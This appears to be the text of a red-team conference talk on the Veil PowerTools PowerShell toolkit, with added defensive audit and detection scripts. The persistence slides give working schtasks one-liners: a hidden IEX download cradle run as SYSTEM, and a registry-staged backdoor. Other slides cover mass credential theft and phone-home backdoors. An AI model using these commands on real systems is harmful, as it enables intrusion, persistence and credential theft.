Drilling Deeper with Veil’s PowerTools
Justin Warner, Will Schroeder
Veris Group’s Adaptive Threat Division
@sixdub
◎Pentester and red teamer for the Adaptive Threat Division of Veris Group
◎Lots of interest: red team ops, reverse engineering, adversarial tactics, etc.
◎Developer on the Veil-Framework and co-founder of Veil’s PowerTools
@harmj0y
◎Security researcher and red teamer for the Adaptive Threat Division of Veris Group
◎Co-founder of the Veil-Framework and founder of Veil’s PowerTools
◎Cons: Shmoocon, CarolinaCon, Defcon, Derbycon, various BSides
tl;dr
◎ Introduction
◎PowerView
◎PowerUp
◎PowerPick
◎PewPewPew
◎PowerBreach
◎Dear M$
◎Demos
◎Questions
Introduction
How We Got Here
The Veil-Framework
◎An offensive toolkit aimed at bridging the gap between pentesting and red teaming capabilities
◎Started with the release of Veil-Evasion
○ expanded with Catapult, Pillage, and PowerView
◎CarolinaCon 2014 - “The Veil-Framework”
Veil’s PowerTools
◎All of our offensive PowerShell work from the Veil-Framework (and other projects) was pulled into the new PowerTools repo
◎PowerTools will remain the primary source for all PowerShell work, with the Veil repo containing offensive Python projects
Sidenote: Why PowerShell
○ PowerShell provides (out of the box):
□ Full .NET access
□ application whitelisting
□ direct access to the Win32 API
□ ability to execute purely in memory
□ default installation Win7+ !
○ “Why I Choose PowerShell as an Attack Platform”
□ http://www.exploit-monday.com/2012/08/Why-I-Choose-PowerShell.html
“Bad Guys”
“PowerShell: Microsoft’s Post-Exploitation Language” - @obscuresec
PowerView
Domain Situational Awareness
Background
◎Think dsquery on steroids... and cocaine
◎First started because a client banned “net” commands on domain machines
◎Otherwise initially inspired by Rob Fuller’s netview.exe tool
○ Wanted something more flexible that also didn’t drop a binary to disk
User Hunting
◎Goal: find which domain machines specific users are logged into
◎Invoke-UserHunter: finds where target users or group members are logged into on the network
◎Invoke-StealthUserHunter: extracts user homeDirectories from AD, gets sessions on all these file servers to hunt for targets
○ Significantly less traffic than Invoke-UserHunter
Offensive Event Parsing
◎Once you get DA, domain controller event logs make it trivial to track down user locations
◎PowerView’s Get-UserLogonEvents lets you easily extract account logon events (4624) from a host
◎Invoke-UserEventHunter wraps this all up into a weaponized form
Domain Trusts
◎PowerView can now enumerate and exploit existing domain trusts:
○ Get-NetDomainTrusts, Get-NetForestDomains
◎Most PowerView functions now accept a “-Domain <name>” flag, allowing them to operate across trusts
○ e.g. Get-NetUsers -Domain sub.test.local
◎Invoke-MapDomainTrusts can recursively map all reachable trusts from a foothold
Data Mining
◎PowerView’s Invoke-ShareFinder -CheckAccess can find all shares readable by the current user
◎Invoke-FileFinder can search a network for open file shares, or take a share list from Invoke-ShareFinder
◎Spits out a .csv of found files, sortable by creation or last access times
PowerUp
Automating Windows Privesc
Background
◎On past assessments, had to escalate privileges on a locked down workstation
◎Kernel exploits wouldn’t work, so fell back to vulnerable service binaries
◎More or less did everything manually, wanted something a bit easier
○ Started implementing the “Encyclopedia of Privesc”
Windows Services
◎One of the most effective escalation vectors was (and still is) vulnerable Windows services
○ Sometimes can modify a service itself
○ Get-ServicePerms will check for these
◎However, many organizations overlook the permissions for service binaries :)
○ Use Get-ServiceEXEPerms, then overwrite the service binary to add a local user or install an agent
.DLL Hijacking
◎Many programs/services will search in multiple locations when loading, including directories listed in the PATH environment variable
◎If you have write access to any folder in PATH, there’s a good chance you can drop a malicious DLL and escalate privileges
○ Invoke-FindPathHijack will search for these opportunities
PowerUp
◎Automates everything we’ve talked about, and more
◎Invoke-AllChecks will run all current checks against a host
◎Functions exist to abuse most of the escalation vectors found
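The two escalation vectors above (writable service binaries, writable PATH directories) are hardening findings as much as attack paths. The following is an added, read-only audit written for this page; it is not PowerUp's code and is not part of the PowerTools repo. It assumes the listed "low-privilege" principals are the ones that matter in your environment (adjust them), and it must run elevated so every service binary's ACL is readable.

```powershell
# Added hardening audit, not PowerUp's own code: list service binaries and
# machine-wide PATH directories that low-privilege principals can modify.
# Read-only; it reports findings and changes nothing. Run it elevated.
# The principal list is an assumption about what counts as "low privilege".

$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace or tamper with a file or directory.
# FullControl is deliberately not OR-ed in: it contains every bit and would
# make the mask match any ACE, including read-only ones.
$fsr = [System.Security.AccessControl.FileSystemRights]
[int]$WriteMask = $fsr::WriteData -bor $fsr::AppendData -bor $fsr::Delete -bor
                  $fsr::ChangePermissions -bor $fsr::TakeOwnership

function Get-ServiceBinaryPath {
    # Extracts the executable path from a Win32_Service.PathName value, which
    # may be quoted ("C:\Program Files\x\svc.exe" -arg), unquoted with spaces,
    # or an unquoted path followed by arguments (svchost.exe -k netsvcs).
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($PathName.Trim())
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $null
    }
    # Unquoted: grow the candidate token by token until it names an existing
    # file, which also handles unquoted paths containing spaces.
    $candidate = ''
    foreach ($token in ($p -split ' ')) {
        $candidate = if ($candidate) { "$candidate $token" } else { $token }
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $null
}

function Test-WeakAcl {
    # Emits one object per Allow ACE that grants a low-privilege principal a
    # write-equivalent right on $Path; emits nothing when the ACL is fine.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop }
    catch { Write-Verbose "Cannot read ACL of ${Path}: $_"; return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Generic access masks (e.g. GENERIC_WRITE) are not mapped here and
        # would be missed; they are rare on file system ACEs.
        if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Get-WeakServiceBinaryAcl {
    # Every service whose binary a low-privilege principal could replace.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not $bin) { continue }
        foreach ($finding in Test-WeakAcl -Path $bin) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Path      = $finding.Path
                Principal = $finding.Principal
                Rights    = $finding.Rights
                Inherited = $finding.Inherited
            }
        }
    }
}

function Get-WeakPathDirectoryAcl {
    # Machine-wide PATH directories a low-privilege principal can write to; a
    # DLL planted there is found by any program that searches PATH on load.
    $machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')
    foreach ($dir in ($machinePath -split ';')) {
        $d = [Environment]::ExpandEnvironmentVariables($dir.Trim())
        if (-not $d) { continue }
        if (-not (Test-Path -LiteralPath $d -PathType Container)) { continue }
        Test-WeakAcl -Path $d
    }
}

Get-WeakServiceBinaryAcl | Format-Table -AutoSize
Get-WeakPathDirectoryAcl | Format-Table -AutoSize
```

The Inherited column matters when triaging: an inherited ACE usually means the weakness lives on a parent directory (commonly an application installed outside Program Files), so the fix belongs there rather than on the single binary. Services reported with RunsAs = LocalSystem are the ones to fix first.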
PowerPick
Lock Picking the AppLocker
Background
◎Incident responders are recognizing and targeting PowerShell.exe
○ Had a client write HIPS rules against psh_psexec, YA, for reals
◎We wanted to be prepared for more situations like this
◎Developed PowerPick as a combination of solutions to run PowerShell without powershell.exe
Bypassing the Blacklist
◎Used assemblies in .NET/C# to execute code
○ System.Management.Automation
◎Developed SharpPick
○ http://www.sixdub.net/2014/12/02/inexorable-powershell-a-red-teamers-tale-of-overcoming-simple-applocker-policies/
◎To defeat this with a blacklist policy (not ideal), you must permission off or block the DLLs in the Global Assembly Cache (GAC)
○ C:\Windows\Assembly\*
OH BTW
Runspaces in Unmanaged Code
◎SharpPick wasn’t very sexy
○ Binary on disk = Lame!
◎Lee Christensen (@tifkin_) authored “UnmanagedPowerShell” to utilize .NET assemblies from C
○ Uses the CLR and a custom .NET assembly in memory
○ https://github.com/leechristensen/UnmanagedPowerShell
◎Transformed this code into a reflective DLL = ReflectivePick
PowerShell Inception = Injection!!
◎Decided it needed more PowerShell
◎Embedded ReflectivePick into Invoke-ReflectivePEInjection from PowerSploit by @josephbialek
○ Created Invoke-PSInjector
◎Injects DLL into remote process that runs PowerShell code
ReflectivePick Diagram
[Figure: Invoke-PSInjector → target *.exe → ReflectivePick → .NET Assembly → Download Cradle]
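Everything in the PowerPick family still has to load the PowerShell engine assembly (System.Management.Automation) into whatever process hosts it, so a defender who cannot blacklist powershell.exe can instead ask which processes carry that DLL. The following is an added detection example written for this page, not PowerPick or PowerTools code. The list of expected hosts is an assumption to tune per environment; it must run elevated and in a session matching the bitness of the processes it inspects, because reading module lists across bitness fails.

```powershell
# Added detection example, not part of PowerPick or PowerTools: find processes
# that have the PowerShell engine loaded but are not a known PowerShell host.

# Hosts where the engine is expected. Extend only after verifying a process is
# legitimate (management agents and some admin consoles also host the engine);
# the list is an assumption, not an authoritative allow-list.
$ExpectedHosts = @('powershell', 'powershell_ise', 'pwsh', 'wsmprovhost')

# System.Management.Automation.dll, or its native image (.ni.dll) that the .NET
# Framework loads from the GAC in place of the IL assembly.
$EnginePattern = '^System\.Management\.Automation(\.ni)?\.dll$'

function Get-UnexpectedPowerShellHosts {
    foreach ($proc in Get-Process) {
        if ($ExpectedHosts -contains $proc.ProcessName) { continue }
        try {
            # Throws Win32Exception for protected/system processes and for
            # bitness mismatches; such processes are logged with -Verbose
            # rather than silently treated as clean.
            $modules = $proc.Modules
        } catch {
            Write-Verbose "Cannot read modules of $($proc.ProcessName) ($($proc.Id)): $_"
            continue
        }
        $engine = $modules | Where-Object { $_.ModuleName -match $EnginePattern } |
                  Select-Object -First 1
        if (-not $engine) { continue }
        [pscustomobject]@{
            ProcessName = $proc.ProcessName
            Id          = $proc.Id
            Path        = $proc.Path
            EngineDll   = $engine.FileName
        }
    }
}

Get-UnexpectedPowerShellHosts | Format-Table -AutoSize
```

A hit is a lead, not a verdict: plenty of legitimate .NET applications embed the engine. What makes it worth a look is the combination the deck describes, an ordinary-looking *.exe that has the engine loaded but never had PowerShell on its command line, and that only picked the DLL up after it started running.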
Invoke-PowerCeption?
PewPewPew
Launching Lazerz at your Targets
Invoke-Mass*
◎Model to run PowerShell scripts on a mass number of machines and retrieve results:
1. A jobbified webserver is kicked off in the background which serves out a specified PowerShell file
2. An IEX() one-liner is executed on machines through WMI to download and execute the hosted code
3. Results are POSTed back to the local webserver
Invoke-MassMimikatz
◎Executes PowerSploit’s Invoke-Mimikatz on multiple machines without PSRemoting
◎Raw Mimikatz results are saved on the pivot host
◎Result files are parsed and Server:Credential objects are output to the pipeline
Invoke-MassSearch
◎Microsoft has another gift for attackers, the Windows Search Indexing Service
○ Why search through all of a system’s files when Windows does this for you?
◎Invoke-MassSearch performs the same pattern as Invoke-MassMimikatz
○ allows you to query the search indexer across machines where you have admin access
PowerBreach
New Release
Background
◎One obvious gap remaining in the workflow of Veil PowerTools
◎Motivation: offense in depth theory
◎Wanted multiple easy ways to remain resident on the compromised systems
○ Memory only
PowerBreach
◎Yes… More PowerShell
○ Why not utilize our favorite scripting language?!
◎Goal: automate a bunch of techniques/tools to backdoor a system
◎Multiple triggers, various host/network signatures
○ We will show some of the “cool” ones
Invoke-EventLogBackdoor
◎Based on Shmoocon 2013 “Wipe The Drive” by Jake Williams (@MalwareJake)
◎Uses Get-WinEvent to monitor Windows event logs for failed RDP attempts
◎When it recognizes the “trigger” username, phones home to attacker
○ With an IEX(...) download cradle
Invoke-PortKnockBackdoor
◎Based upon Get-Packet by Robbie Foust http://blog.robbiefoust.com/?p=68
○ Uses system.net.sockets.socket to create a raw socket
○ Uses socket.iocontrol to make it promiscuous
◎Promiscuously sniffs traffic on the system and inspects data for a “magic” trigger value
○ UDP, TCP, ICMP
Invoke-DeadUserBackdoor
◎Common action of attackers is to add domain/local users
◎Uses ADSI to monitor for a user’s existence
◎If the user is not found, assumes the worst and phones home
Invoke-ResolverBackdoor
◎Attempts to be a little stealthier and usable on external assessments
◎Resolves a specified DNS name on an interval, and if the resolution doesn’t equal a predefined IP...
◎… PHONE HOME TO THAT IP!
Persistence… If you must
◎Focuses more on non-persistent backdoors
◎Scheduled tasks seem to work really well for PowerShell in domain networks
schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -NonI -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://server/script.ps1''))'" /sc onlogon /ru System
Registry Storage
◎Better yet, stage your script in the registry!
$backdoor = "write-host 123"
Set-ItemProperty -Path 'HKLM:\HARDWARE' -Name 'secret' -Value $backdoor
schtasks /create /tn Updater /tr "powershell -c 'IEX (gp HKLM:HARDWARE).secret'" /sc onlogon /ru System
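Both persistence variants above, and the WMI-launched one-liner from the Invoke-Mass* slides, leave the same thing behind for a defender: a PowerShell command line carrying a download cradle, an IEX, hidden/no-profile/non-interactive flags, or a registry read, running as SYSTEM at logon or under a WmiPrvSE.exe parent. The following is an added detection example written for this page, not PowerTools code. It inspects scheduled task actions and live process command lines; the pattern names and the pattern list are this example's own choices, and it assumes the ScheduledTasks module (Windows 8 / Server 2012 and later).

```powershell
# Added detection example, not part of PowerTools: inspects the command lines
# behind (a) every scheduled task action and (b) every running process for
# PowerShell launched with the flag and download-cradle combinations shown on
# the persistence slides, and flags PowerShell processes whose parent is the
# WMI provider host. Read-only.

# Pattern names and regexes are this example's own choices.
$SuspiciousPatterns = [ordered]@{
    DownloadCradle   = '(?i)(DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\bcurl\b|\bwget\b)'
    InvokeExpression = '(?i)(\bIEX\b|Invoke-Expression)'
    HiddenWindow     = '(?i)(^|\s)-w\S*\s+hidden'
    NoProfile        = '(?i)(^|\s)-nop\S*'
    NonInteractive   = '(?i)(^|\s)-noni\S*'
    EncodedCommand   = '(?i)(^|\s)-e(c|nc\S*)?\s+[A-Za-z0-9+/=]{20,}'
    RegistryStaged   = '(?i)(Get-ItemProperty|\bgp\b)\s+HK(LM|CU):'
}

function Test-PowerShellCommandLine {
    # Returns the names of the patterns a command line matches; an empty array
    # means the line is not a PowerShell invocation or shows none of them.
    param([AllowEmptyString()][string]$CommandLine)
    if ($CommandLine -notmatch '(?i)\b(powershell|pwsh)(\.exe)?\b') { return @() }
    $reasons = foreach ($name in $SuspiciousPatterns.Keys) {
        if ($CommandLine -match $SuspiciousPatterns[$name]) { $name }
    }
    return @($reasons)
}

function Get-SuspiciousScheduledTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # COM-handler actions have no Execute/Arguments; skip them.
            if (-not $action.Execute) { continue }
            $cmd = ("$($action.Execute) $($action.Arguments)").Trim()
            $reasons = @(Test-PowerShellCommandLine $cmd)
            if ($reasons.Count -eq 0) { continue }
            # MSFT_TaskLogonTrigger -> LogonTrigger, etc.
            $triggers = foreach ($t in $task.Triggers) { $t.CimClass.CimClassName -replace '^MSFT_Task', '' }
            [pscustomobject]@{
                Source   = 'ScheduledTask'
                Name     = "$($task.TaskPath)$($task.TaskName)"
                RunAs    = $task.Principal.UserId
                Parent   = ($triggers -join ',')
                Command  = $cmd
                Reasons  = ($reasons -join ',')
            }
        }
    }
}

function Get-SuspiciousProcesses {
    $procs = @(Get-CimInstance -ClassName Win32_Process)
    $byId = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }
    foreach ($p in $procs) {
        $reasons = @(Test-PowerShellCommandLine ([string]$p.CommandLine))
        $parent = $byId[[int]$p.ParentProcessId]
        # PowerShell spawned by the WMI provider host is how a WMI-delivered
        # one-liner lands on a target; admins rarely launch it that way.
        if ($parent -and $parent.Name -ieq 'WmiPrvSE.exe' -and
            $p.Name -imatch '^(powershell|pwsh)\.exe$') {
            $reasons += 'WmiParent'
        }
        if ($reasons.Count -eq 0) { continue }
        $owner = Invoke-CimMethod -InputObject $p -MethodName GetOwner -ErrorAction SilentlyContinue
        $runAs = if ($owner -and $owner.User) { "$($owner.Domain)\$($owner.User)" } else { $null }
        $parentLabel = if ($parent) { "$($parent.Name) ($($parent.ProcessId))" } else { "pid $($p.ParentProcessId)" }
        [pscustomobject]@{
            Source  = 'Process'
            Name    = "$($p.Name) ($($p.ProcessId))"
            RunAs   = $runAs
            Parent  = $parentLabel
            Command = $p.CommandLine
            Reasons = ($reasons -join ',')
        }
    }
}

@(Get-SuspiciousScheduledTasks) + @(Get-SuspiciousProcesses) | Format-Table -AutoSize -Wrap
```

Fed the OfficeUpdater one-liner from the slide above, Test-PowerShellCommandLine returns DownloadCradle, InvokeExpression, HiddenWindow, NoProfile and NonInteractive; the registry-staged Updater variant returns InvokeExpression and RegistryStaged. For tasks, the Parent column holds the trigger types, so a hit with LogonTrigger and RunAs SYSTEM is exactly the shape both slides describe. Running this once is a point-in-time check; the same classifier applied to process-creation events (4688 or Sysmon event 1) as they arrive is what turns it into detection.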
So what?
◎Nothing revolutionary here!
◎Nothing worse than owning a system and not being able to get back on later!
◎Real power comes when combining PowerTools
○ PewPewPew with PowerBreach
2 Cents
Almost ready for the show!
Obligatory Defense Slide
◎HIPS and whitelisting generally help endpoint defense
◎Enterprise incident response capabilities
○ Memory only capabilities, but scripts (“malware”) are able to be easily recovered and analyzed
◎Need a clear way to restrict PowerShell & .NET assemblies to certain users
True Story…
Demos
Questions?
◎Justin
○ @sixdub
○ http://www.sixdub.net/
○ justin [at] sixdub.net
◎Will
○ @harmj0y
○ http://blog.harmj0y.net/
○ will [at] harmj0y.net
◎https://github.com/veil-framework/PowerTools